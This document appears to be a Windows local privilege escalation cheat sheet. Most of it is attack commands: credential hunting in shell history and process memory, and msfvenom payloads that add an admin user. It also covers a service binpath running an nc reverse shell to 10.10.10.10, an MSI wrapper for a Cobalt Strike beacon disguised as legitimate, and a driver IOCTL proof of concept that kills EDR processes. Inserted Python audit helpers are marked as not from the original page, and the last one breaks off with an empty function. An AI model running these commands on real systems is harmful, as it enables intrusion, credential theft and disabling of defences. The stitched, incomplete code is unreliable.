Windows Local Privilege Escalation
Best tool to look for Windows local privilege escalation vectors: WinPEAS
Initial Windows Theory
Access Tokens
If you don't know what Windows Access Tokens are, read the following page before continuing:
ACLs - DACLs/SACLs/ACEs
Check the following page for more info about ACLs - DACLs/SACLs/ACEs:
Integrity Levels
If you don't know what integrity levels in Windows are, read the following page before continuing:
Windows Security Controls
There are different things in Windows that could prevent you from enumerating the system, running executables, or even detect your activities. Read the following page and enumerate all these defense mechanisms before starting the privilege escalation enumeration:
System Info
Version info enumeration
Check if the Windows version has any known vulnerability (also check which patches have been applied).
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
Version Exploits
This site is handy for searching out detailed information about Microsoft security vulnerabilities. The database has more than 4,700 security vulnerabilities, showing the massive attack surface that a Windows environment presents.
On the system
- post/windows/gather/enum_patches
- post/multi/recon/local_exploit_suggester
- watson
- winpeas (Winpeas has watson embedded)
Locally with system information
Github repos of exploits:
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/abatchy17/WindowsExploits
- https://github.com/SecWiki/windows-kernel-exploits
Environment
Any credentials or juicy information saved in the environment variables?
set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize
PowerShell History
ConsoleHost_history #Find the PATH where is saved
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
PowerShell Transcript files
You can learn how to turn this on at https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/
#Check if it is enabled in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts
#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript
PowerShell Module Logging
Details of PowerShell pipeline executions are recorded, encompassing executed commands, command invocations, and parts of scripts. However, complete execution details and output results might not be captured.
To enable this, follow the instructions in the "Transcript files" section of the documentation, opting for "Module Logging" instead of "Powershell Transcription".
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
To view the last 15 events from the PowerShell logs, you can execute:
Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView
PowerShell Script Block Logging
A complete activity and full content record of the script's execution is captured, ensuring that every block of code is documented as it runs. This process preserves a comprehensive audit trail of each activity, valuable for forensics and for analyzing malicious behavior. By documenting all activity at the time of execution, detailed insights into the process are provided.
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
Logging events for the Script Block can be found in the Windows Event Viewer at the path: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
To view the last 20 events you can use:
Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview
Internet Settings
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Drives
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
WSUS
You can compromise the system if the updates are not requested using httpS but http.
You start by checking if the network uses a non-SSL WSUS update by running the following in cmd:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
Or the following in PowerShell:
Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"
If you get a reply such as one of these:
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535
WUServer : http://xxxx-updxx.corp.internal.com:8530
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName : windowsupdate
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
And if HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer or Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" is equal to 1, then it is exploitable. If that last registry value is equal to 0, the WSUS entry will be ignored.
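As an added example (not code from the original page), a small Python audit helper that applies the rule above to captured `reg query` output: the configuration is only at risk when WUServer is a plain http:// URL and UseWUServer is 1. The sample output is constructed in the shape shown above and the server hostname is a placeholder.

```python
import re
from typing import Dict, Optional, Tuple

# Constructed `reg query` output in the shape shown above (not captured from a
# real host); the server hostname is a placeholder.
WUSERVER_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
    WUServer    REG_SZ    http://wsus-placeholder.corp.internal:8530
    WUStatusServer    REG_SZ    http://wsus-placeholder.corp.internal:8530
"""

USEWUSERVER_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
    UseWUServer    REG_DWORD    0x1
"""

# One value line looks like "<name>  <REG_TYPE>  <data>"; key-path lines carry
# no REG_ token and therefore never match.
_VALUE_LINE = re.compile(r"^\s*(\S+)\s+(REG_[A-Z_]+)\s+(.*?)\s*$")


def parse_reg_query(output: str) -> Dict[str, Tuple[str, str]]:
    """Map each value name (lower-cased) in `reg query` output to (type, data)."""
    values: Dict[str, Tuple[str, str]] = {}
    for line in output.splitlines():
        m = _VALUE_LINE.match(line)
        if m:
            name, reg_type, data = m.groups()
            values[name.lower()] = (reg_type, data)
    return values


def reg_dword(values: Dict[str, Tuple[str, str]], name: str) -> Optional[int]:
    """Return a REG_DWORD as int (reg.exe prints it as 0x...), or None if absent."""
    entry = values.get(name.lower())
    if entry is None or entry[0] != "REG_DWORD":
        return None
    return int(entry[1], 0)


def assess_wsus(wuserver_output: str, usewuserver_output: str) -> dict:
    """Apply the rule from the text: WSUS traffic can be tampered with only when
    WUServer is an http:// URL AND UseWUServer is 1 (with 0 the entry is ignored)."""
    server = parse_reg_query(wuserver_output).get("wuserver", (None, None))[1]
    use_wuserver = reg_dword(parse_reg_query(usewuserver_output), "UseWUServer")
    plaintext = server is not None and server.lower().startswith("http://")
    return {
        "server": server,
        "use_wuserver": use_wuserver,
        "plaintext_http": plaintext,
        "exploitable": plaintext and use_wuserver == 1,
    }
```

The fix on the defending side is the same in both checks: point WUServer at an https:// URL, or disable UseWUServer.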
In order to exploit this vulnerability you can use tools like Wsuxploit or pyWSUS. These are MiTM weaponized exploit scripts to inject "fake" updates into non-SSL WSUS traffic.
Read the research here:
WSUS CVE-2020-1013
Read the complete report here.
Basically, this is the flaw that this bug exploits:
If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer's settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.
Furthermore, since the WSUS service uses the current user's settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user's certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.
You can exploit this vulnerability using the tool WSUSpicious (once it's liberated).
Third-Party Auto-Updaters and Agent IPC (local privesc)
Many enterprise agents expose a localhost IPC surface and a privileged update channel. If enrollment can be coerced to an attacker server and the updater trusts a rogue root CA or has weak signer checks, a local user can deliver a malicious MSI that the SYSTEM service installs. See a generalized technique (based on the Netskope stAgentSvc chain, CVE-2025-0309) here:
KrbRelayUp
A local privilege escalation vulnerability exists in Windows domain environments under specific conditions. These conditions include environments where LDAP signing is not enforced, users possess self-rights allowing them to configure Resource-Based Constrained Delegation (RBCD), and the capability for users to create computers within the domain. It is important to note that these requirements are met using default settings.
Find the exploit in https://github.com/Dec0ne/KrbRelayUp
For more information about the flow of the attack check https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/
AlwaysInstallElevated
If these 2 registry values are enabled (value is 0x1), then users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Metasploit payloads
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted
If you have a meterpreter session you can automate this technique using the module exploit/windows/local/always_install_elevated.
PowerUP
Use the Write-UserAddMSI command from PowerUP to create inside the current directory a Windows MSI binary to escalate privileges. This script writes out a precompiled MSI installer that prompts for a user/group addition (so you will need GUI access):
Write-UserAddMSI
Just execute the created binary to escalate privileges.
MSI Wrapper
Read this tutorial to learn how to create an MSI wrapper using these tools. Note that you can wrap a ".bat" file if you just want to execute command lines.
Create MSI with WIX
Create MSI with Visual Studio
- Generate with Cobalt Strike or Metasploit a new Windows EXE TCP payload in C:\privesc\beacon.exe
- Open Visual Studio, select Create a new project and type "installer" into the search box. Select the Setup Wizard project and click Next.
- Give the project a name, like AlwaysPrivesc, use C:\privesc for the location, select place solution and project in the same directory, and click Create.
- Keep clicking Next until you get to step 3 of 4 (choose files to include). Click Add and select the Beacon payload you just generated. Then click Finish.
- Highlight the AlwaysPrivesc project in the Solution Explorer and in the Properties, change TargetPlatform from x86 to x64.
- There are other properties you can change, such as the Author and Manufacturer, which can make the installed app look more legitimate.
- Right-click the project and select View > Custom Actions.
- Right-click Install and select Add Custom Action.
- Double-click on Application Folder, select your beacon.exe file and click OK. This will ensure that the beacon payload is executed as soon as the installer is run.
- Under the Custom Action Properties, change Run64Bit to True.
- Finally, build it.
- If the warning File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' is shown, make sure you set the platform to x64.
MSI Installation
To execute the installation of the malicious .msi file in the background:
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
To exploit this vulnerability you can use: exploit/windows/local/always_install_elevated
Antivirus and Detectors
Audit Settings
These settings decide what is being logged, so you should pay attention to them.
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
WEF
Windows Event Forwarding: it is interesting to know where the logs are sent.
reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
LAPS
LAPS is designed for the management of local Administrator passwords, ensuring that each password is unique, randomised, and regularly updated on computers joined to a domain. These passwords are securely stored within Active Directory and can only be accessed by users who have been granted sufficient permissions through ACLs, allowing them to view local admin passwords if authorized.
WDigest
If active, plain-text passwords are stored in LSASS (Local Security Authority Subsystem Service).
More info about WDigest in this page.
reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential
LSA Protection
Starting with Windows 8.1, Microsoft introduced enhanced protection for the Local Security Authority (LSA) to block attempts by untrusted processes to read its memory or inject code, further securing the system.
More info about LSA Protection here.
reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL
Credentials Guard
Credential Guard was introduced in Windows 10. Its purpose is to safeguard the credentials stored on a device against threats like pass-the-hash attacks. More info about Credentials Guard here.
reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags
Cached Credentials
Domain credentials are authenticated by the Local Security Authority (LSA) and utilized by operating system components. When a user's logon data is authenticated by a registered security package, domain credentials for the user are typically established.
More info about Cached Credentials here.
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
Users & Groups
Enumerate Users and Groups
You should check if any of the groups you belong to have interesting permissions.
# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges
# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Privileged groups
If you belong to some privileged group you may be able to escalate privileges. Learn about privileged groups and how to abuse them to escalate privileges here:
Token manipulation
Learn more about what a token is on this page: Windows Tokens.
Check the following page to learn about interesting tokens and how to abuse them:
Logged users / Sessions
qwinsta
klist sessions
Home folders
dir C:\Users
Get-ChildItem C:\Users
Password Policy
net accounts
Get the content of the clipboard
powershell -command "Get-Clipboard"
Running Processes
File and Folder Permissions
First of all, when listing the processes check for passwords inside the command line of each process.
Check if you can overwrite some running binary, or if you have write permissions on the binary folder, to exploit possible DLL Hijacking attacks:
Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes
#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
Always check for possible electron/cef/chromium debuggers running; you could abuse them to escalate privileges.
Checking permissions of the processes' binaries
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)
Checking permissions of the folders of the processes' binaries (DLL Hijacking)
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
Memory Password mining
You can create a memory dump of a running process using procdump from sysinternals. Services like FTP keep the credentials in clear text in memory, so try to dump the memory and read the credentials.
procdump.exe -accepteula -ma <proc_name_tasklist>
Insecure GUI apps
Applications running as SYSTEM may allow a user to spawn a CMD or browse directories.
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt".
Services
Service Triggers allow Windows to start a service when certain conditions occur (named pipe/RPC endpoint activity, ETW events, IP availability, device arrival, GPO refresh, etc.). Even without SERVICE_START rights you can often start privileged services by firing their triggers. See enumeration and activation techniques here:
Get a list of services:
net start
wmic service list brief
sc query
Get-Service
Permissions
You can use sc to get information about a service.
sc qc <service_name>
It is recommended to have the binary accesschk from Sysinternals to check the required privilege level for each service.
accesschk.exe -ucqv <Service_Name> #Check rights for different groups
It is recommended to check if "Authenticated Users" can modify any service:
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
You can download accesschk.exe for XP from here.
Enable service
If you are getting this error (for example with SSDPSRV):
System error 1058 has occurred.
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
You can enable it using:
sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""
Take into account that the service upnphost depends on SSDPSRV to work (for XP SP1).
Another workaround for this problem is running:
sc.exe config usosvc start= auto
Modify service binary path
In the scenario where the "Authenticated users" group possesses SERVICE_ALL_ACCESS on a service, modification of the executable binary of the service is possible. To modify it and execute, use sc:
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd /c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
Restart service
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]
Privileges can be escalated through various permissions:
- SERVICE_CHANGE_CONFIG: Allows reconfiguration of the service binary.
- WRITE_DAC: Enables permission reconfiguration, leading to the ability to change service configurations.
- WRITE_OWNER: Permits ownership acquisition and permission reconfiguration.
- GENERIC_WRITE: Inherits the ability to change service configurations.
- GENERIC_ALL: Also inherits the ability to change service configurations.
For the detection and exploitation of this vulnerability, exploit/windows/local/service_permissions can be utilized.
Services binaries weak permissions
Check if you can modify the binary that is executed by a service or if you have write permissions on the folder where the binary is located (DLL Hijacking).
You can get every binary that is executed by a service using wmic (not in system32) and check your permissions using icacls:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"
You can also use sc and icacls:
sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt
Services registry modify permissions
You should check if you can modify any service registry key.
You can check your permissions over a service registry key by doing:
reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
It should be checked whether Authenticated Users or NT AUTHORITY\INTERACTIVE possess FullControl permissions. If so, the binary executed by the service can be altered.
To change the path of the binary that is executed:
reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f
Services registry AppendData/AddSubdirectory permissions
If you have this permission over a registry key, it means you can create sub-keys under it. In the case of Windows services this is enough to execute arbitrary code:
AppendData/AddSubdirectory permission over service registry
Unquoted Service Paths
If the path to an executable is not inside quotes, Windows will try to execute every ending before a space.
For example, for the path C:\Program Files\Some Folder\Service.exe Windows will try to execute:
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe
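As an added example (not code from the original page), the same lookup expansion in Python: it parses a constructed service listing in the shape of `wmic service get name,pathname,startmode /format:csv`, skips quoted paths and services under the Windows directory, expands the candidates Windows would try (including paths that carry arguments after the .exe), and lists the directories whose ACLs must not be writable by standard users. Service names and paths in the sample are made up.

```python
import csv
import ntpath
import re
from typing import Dict, List

# Constructed listing in the shape of `wmic service get name,pathname,startmode
# /format:csv` (first column is the node name); names and paths are made up.
SAMPLE_WMIC_CSV = r"""
Node,Name,PathName,StartMode
HOST1,VulnSvc,C:\Program Files\Some Folder\Service.exe,Auto
HOST1,SafeSvc,"C:\Program Files\Safe Vendor\svc.exe" -run,Auto
HOST1,Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST1,ArgSvc,C:\Tools\My Agent\agent.exe --log C:\Tools\agent log.txt,Manual
"""

_EXE = re.compile(r"\.exe", re.IGNORECASE)


def executable_part(image_path: str) -> str:
    """Image path up to and including the first '.exe'; arguments after it are dropped."""
    m = _EXE.search(image_path)
    return image_path[: m.end()] if m else image_path


def is_unquoted_with_spaces(image_path: str) -> bool:
    """Only an unquoted executable path that contains a space triggers the lookup."""
    p = image_path.strip()
    return not p.startswith('"') and " " in executable_part(p)


def search_candidates(image_path: str) -> List[str]:
    """Expand the order Windows tries: every prefix ending before a space with
    '.exe' appended, and finally the real executable."""
    exe = executable_part(image_path.strip())
    candidates = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    candidates.append(exe)
    return candidates


def hijack_directories(candidates: List[str]) -> List[str]:
    """Parents of every candidate except the real one: a file planted there wins
    the lookup, so these are the ACLs that must not grant write to standard users."""
    return [ntpath.dirname(c) for c in candidates[:-1]]


def find_unquoted_services(wmic_csv: str, skip_windows: bool = True) -> Dict[str, List[str]]:
    """Return {service name: candidates} for every unquoted path with spaces,
    optionally skipping built-in services under the Windows directory."""
    # QUOTE_NONE keeps the quote characters in PathName so quoting can be checked.
    rows = csv.DictReader(wmic_csv.strip().splitlines(), quoting=csv.QUOTE_NONE)
    findings: Dict[str, List[str]] = {}
    for row in rows:
        path = row["PathName"]
        if skip_windows and executable_part(path).lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_with_spaces(path):
            findings[row["Name"]] = search_candidates(path)
    return findings
```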
List all unquoted service paths, excluding those belonging to built-in Windows services:
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"' # Not only auto services
# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
You can detect and exploit this vulnerability with metasploit: exploit/windows/local/trusted_service_path. You can manually create a service binary with metasploit:
msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
Recovery Actions
Windows allows users to specify actions to be taken if a service fails. This feature can be configured to point to a binary. If this binary is replaceable, privilege escalation might be possible. More details can be found in the official documentation.
Applications
Installed Applications
Check the permissions of the binaries (maybe you can overwrite one and escalate privileges) and of the folders (DLL Hijacking).
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Write Permissions
Check if you can modify some config file to read some special file, or if you can modify some binary that is going to be executed by an Administrator account (schedtasks).
A way to find weak folder/file permissions in the system is doing:
accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwqs "Everyone" c:\*.*
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
Run at startup
Check if you can overwrite some registry key or binary that is going to be executed by a different user.
Read the following page to learn more about interesting autoruns locations to escalate privileges:
Privilege Escalation with Autoruns
Drivers
Look for possible third-party weird/vulnerable drivers
driverquery
driverquery.exe /fo table
driverquery /SI
If a driver exposes an arbitrary kernel read/write primitive (common in poorly designed IOCTL handlers), you can escalate by stealing a SYSTEM token directly from kernel memory. See the step-by-step technique here:
Arbitrary Kernel Rw Token Theft
In race-condition bugs where the vulnerable call walks an attacker-controlled Object Manager path, the lookup can be intentionally delayed (using maximum-length components and deep directory chains) to stretch the race window from microseconds to tens of microseconds:
Kernel Race Condition Object Manager Slowdown
Registry hive memory corruption primitives
Modern hive vulnerabilities let you groom deterministic layouts, abuse writable HKLM/HKU descendants, and convert metadata corruption into kernel paged-pool overflows without a custom driver. Learn the full chain here:
Windows Registry Hive Exploitation
Abusing missing FILE_DEVICE_SECURE_OPEN on device objects (LPE + EDR kill)
Some signed third-party drivers create their device object with IoCreateDeviceSecure and a strong SDDL but forget to set FILE_DEVICE_SECURE_OPEN in DeviceCharacteristics. Without this flag, the secure DACL is not applied when the device is opened through a path that contains an extra component, which lets any unprivileged user obtain a handle using a namespace path such as:
- \\.\DeviceName\anything
- \\.\amsdk\anyfile (from a real-world case)
Once a user can open the device, the privileged IOCTLs exposed by the driver can be abused for LPE and tampering. Examples observed in the wild:
- Returning full-access handles to arbitrary processes (token theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUser).
- Unrestricted raw disk read/write (offline tampering, boot-time persistence tricks).
- Terminating arbitrary processes, including Protected Process/Light (PP/PPL), enabling user-mode AV/EDR kill from the kernel.
Minimal PoC pattern (user mode):
// Example based on a vulnerable antimalware driver
#define IOCTL_REGISTER_PROCESS 0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048
HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DeviceIoControl(h, IOCTL_REGISTER_PROCESS, &me, sizeof(me), 0, 0, 0, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0);
Mitigations for developers
- Always set FILE_DEVICE_SECURE_OPEN when creating device objects intended to be restricted by a DACL.
- Validate the caller context for privileged operations. Add PP/PPL checks before allowing process termination or handle return.
- Restrict IOCTLs (access masks, METHOD_*, input validation) and consider a brokered model instead of granting direct kernel privileges.
Detection ideas for defenders
- Monitor user-mode opens of suspicious device names (e.g., \\.\amsdk*) and specific IOCTL sequences indicative of abuse.
- Enforce Microsoft's vulnerable driver blocklist (HVCI/WDAC/Smart App Control) and maintain your own allow/deny lists.
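As an added example for the detection idea above (not code from the original page), a small Python matcher over constructed open-device telemetry lines: it flags opens of a watched device name that append an extra path component, which is exactly the shape that dodges the DACL when FILE_DEVICE_SECURE_OPEN is missing, while a bare open of the device name by the vendor's own agent stays unflagged. The event format, PIDs and image paths are made up; only the amsdk device name comes from the case above.

```python
import re
from typing import List, Optional, Tuple

# Device-name prefixes to watch; "amsdk" is the name from the case above.
WATCHED_DEVICE_PREFIXES = ("amsdk",)

# Constructed telemetry lines (format, PIDs and image paths are made up),
# modelled on a CreateFile event that carries the requested path at the end.
SAMPLE_OPEN_EVENTS = r"""
2024-05-01T10:00:01Z pid=1200 image=C:\Vendor\agent.exe op=CreateFile path=\\.\amsdk
2024-05-01T10:00:02Z pid=4242 image=C:\Users\alice\tool.exe op=CreateFile path=\\.\amsdk\anyfile
2024-05-01T10:00:03Z pid=3300 image=C:\Windows\explorer.exe op=CreateFile path=C:\Users\alice\notes.txt
2024-05-01T10:00:04Z pid=5100 image=C:\Users\alice\tool.exe op=CreateFile path=\\?\amsdk\..\x
"""

# Win32 device prefix: two backslashes, then '.' or '?', then one backslash.
_DEVICE_PATH = re.compile(r"^\\\\[.?]\\(.+)$")
_EVENT = re.compile(r"pid=(\d+)\s+image=(\S+)\s+op=(\w+)\s+path=(\S+)")


def split_device_path(path: str) -> Optional[Tuple[str, List[str]]]:
    """Split a device path into (device name, [extra components]).
    Returns None for ordinary drive-letter paths."""
    m = _DEVICE_PATH.match(path)
    if not m:
        return None
    parts = m.group(1).split("\\")
    return parts[0], [p for p in parts[1:] if p]


def is_suspicious_open(path: str) -> bool:
    """A watched device opened with at least one extra component: the open goes
    through without the secure DACL when FILE_DEVICE_SECURE_OPEN is missing."""
    split = split_device_path(path)
    if split is None:
        return False
    device, extra = split
    return device.lower().startswith(WATCHED_DEVICE_PREFIXES) and len(extra) > 0


def detect_suspicious_opens(log_text: str) -> List[Tuple[int, str, str]]:
    """Return (pid, image, path) for every CreateFile event with a suspicious path."""
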